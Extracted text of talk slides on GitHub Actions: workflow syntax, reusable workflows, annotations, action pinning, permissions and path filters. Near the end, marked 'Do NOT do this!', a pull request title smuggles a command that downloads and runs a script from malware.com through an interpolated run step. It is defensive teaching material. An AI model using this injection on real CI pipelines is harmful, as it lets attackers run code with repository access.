A talk by @thorstenfrommen
name: GitHub Actions Demo
on: [push]
jobs:
github-actions-demo:
runs-on: ubuntu-latest
steps:
- run: |
echo 'Event: ${{ github.event_name }}'
echo 'Repository: ${{ github.repository }}'
echo 'Branch: ${{ github.ref }}'
- uses: actions/checkout@v4
- run: |
ls ${{ github.workspace }}
jobs:
lint:
uses: tfrommen/gha/lint-php@main
coding-standards:
uses: tfrommen/gha/coding-standards-php@main
static-analysis:
uses: tfrommen/gha/static-analysis-php@main
jobs:
php-quality-assurance:
runs-on: ubuntu-latest
steps:
- uses: tfrommen/gha/lint-php@main
- uses: tfrommen/gha/coding-standards-php@main
- uses: tfrommen/gha/static-analysis-php@main
jobs:
lint:
uses: tfrommen/gha/lint-php@main
coding-standards:
uses: tfrommen/gha/coding-standards-php@main
static-analysis:
uses: tfrommen/gha/static-analysis-php@main
jobs:
lint:
uses: tfrommen/gha/lint-php@main
coding-standards:
needs: lint
uses: tfrommen/gha/coding-standards-php@main
static-analysis:
needs: lint
uses: tfrommen/gha/static-analysis-php@main
jobs:
php-quality-assurance:
runs-on: ubuntu-latest
steps:
- uses: tfrommen/gha/lint-php@main
- uses: tfrommen/gha/coding-standards-php@main
jobs:
php-quality-assurance:
runs-on: ubuntu-latest
timeout-minutes: 15
steps:
- uses: tfrommen/gha/lint-php@main
- uses: tfrommen/gha/coding-standards-php@main
jobs:
php-quality-assurance:
runs-on: ubuntu-latest
steps:
- timeout-minutes: 5
uses: tfrommen/gha/lint-php@main
- timeout-minutes: 10
uses: tfrommen/gha/coding-standards-php@main
concurrency:
group: ${{ github.workflow }}-${{ github.ref }}
cancel-in-progress: true
concurrency:
group: ${{ github.workflow }}-${{ github.ref }}
cancel-in-progress: ${{ !contains(github.ref, 'release/')}}
on:
schedule:
- cron: '0 0 * * *'
*
is a special character in YAML, you need to quote.
inpsyde/wp-stubs
.
on: workflow_dispatch
on: workflow_call
.github/workflows/my-workflow.yml
:
jobs:
my-workflow:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: ./.github/workflows/my-reusable-workflow
.github/workflows/my-reusable-workflow.yml
:
on: workflow_call
jobs:
my-reusable-workflow:
runs-on: ubuntu-latest
steps:
- ...
.github/workflows/my-workflow.yml
:
jobs:
my-workflow:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: ./.github/actions/my-action
.github/actions/my-action/action.yml
:
name: My Custom Composite Action
runs:
using: composite
steps:
- ...
::debug::<MESSAGE>
jobs:
debug-workflow:
runs-on: ubuntu-latest
steps:
- run: |
echo "::debug::This is only visible in Debug Mode!"
jobs:
script:
runs-on: ubuntu-latest
steps:
- run: |
echo "Starting..."
some-command-that-fails
echo "Done!"
jobs:
script:
runs-on: ubuntu-latest
steps:
- shell: bash {0}
run: |
echo "Starting..."
some-command-that-fails
echo "Done!"
jobs:
script:
runs-on: ubuntu-latest
steps:
- shell: bash {0}
run: |
some-command-that-fails
CODE=$?
# Maybe write to file, process data, send request etc.
exit $CODE
notice
, warning
, and error
.title
.
::<TYPE> file=<FILE>,line=<LINE>::<MESSAGE>
jobs:
annotate-readme:
runs-on: ubuntu-latest
steps:
- run: |
echo "::notice file=README.md,line=1::😍"
jobs:
annotate-parallel-lint:
runs-on: ubuntu-latest
steps:
- shell: bash {0}
run: |
JSON=$(parallel-lint --json --no-colors --no-progress .)
[[ "$JSON" =~ '"errors":[]' ]] && exit 0
echo "$JSON" | jq -r '.results.errors[] | "::error file=\(.file),line=\(.line)::\(.message)"'
exit 1
$GITHUB_STEP_SUMMARY
file.
jobs:
summary:
runs-on: ubuntu-latest
steps:
- run: |
echo '### Hello world! :rocket:' >> $GITHUB_STEP_SUMMARY
jobs:
lint:
uses: tfrommen/gha/lint-php@main
coding-standards:
uses: tfrommen/gha/coding-standards-php@v1
static-analysis:
uses: tfrommen/gha/static-analysis-php@1d6d001adedabdbfd3d8dbddfc7cc7f5e032882e
permissions:
actions: read|write|none
attestations: read|write|none
checks: read|write|none
contents: read|write|none
deployments: read|write|none
id-token: write|none
issues: read|write|none
discussions: read|write|none
packages: read|write|none
pages: read|write|none
pull-requests: read|write|none
repository-projects: read|write|none
security-events: read|write|none
statuses: read|write|none
permissions: {}
permissions:
contents: read
pull-requests: write
push
, pull_request
, and pull_request_target
.
on:
push:
paths:
- '**.php'
- '!tests/**'
jobs:
composer-validate:
steps:
- uses: actions/checkout@v4
- uses: dorny/paths-filter@v2
id: paths
with:
filters: |
composer:
- 'composer.json'
- 'composer.lock'
- if: ${{ steps.paths.outputs.composer == 'true' }}
uses: ./.github/actions/setup-php
- if: ${{ steps.paths.outputs.composer == 'true' }}
run: composer validate --no-check-all --no-check-publish
filters: |
workflows: &workflows
- '.github/actions/**/*.yml'
- '.github/workflows/**/*.yml'
npm: &npm
- *workflows
- 'package.json'
- 'package-lock.json'
javascript:
- *npm
- '**/*.js'
- '**/*.jsx'
styles:
- *npm
- '**/*.css'
- '**/*.scss'
- if: ${{ toJSON( steps.paths.outputs.changes ) != '"[]"' }}
uses: ./.github/actions/setup-node
- if: ${{ toJSON( steps.paths.outputs.changes ) != '"[]"' }}
run: npm ci --no-progress --no-fund --no-audit --loglevel error
- if: ${{ steps.paths.outputs.javascript == 'true' || steps.paths.outputs.npm == 'true' }}
run: npm test
- if: ${{ steps.paths.outputs.javascript == 'true' || steps.paths.outputs.styles == 'true' || steps.paths.outputs.npm == 'true' }}
run: npm run build
- run: |
./scripts/check-title.sh ${{github.event.pull_request.title}}
Do NOT do this!
"title" && curl https://malware.com/malware.sh && ./malware.sh
- uses: tfrommen/gha/check-title@main
with:
title: ${{github.event.pull_request.title}}
- env:
TITLE: ${{github.event.pull_request.title}}
run: |
./scripts/check-title.sh $TITLE
name: Lint GitHub Actions workflows
on: [pull_request]
jobs:
lint-workflows:
uses: inpsyde/reusable-workflows/.github/workflows/lint-workflows.yml@main
.github/dependabot.yml
:
version: 2
updates:
- package-ecosystem: "github-actions"
directory: "/"
schedule:
interval: "weekly"
You?
Slides: slides.tfrommen.de/gha-wcka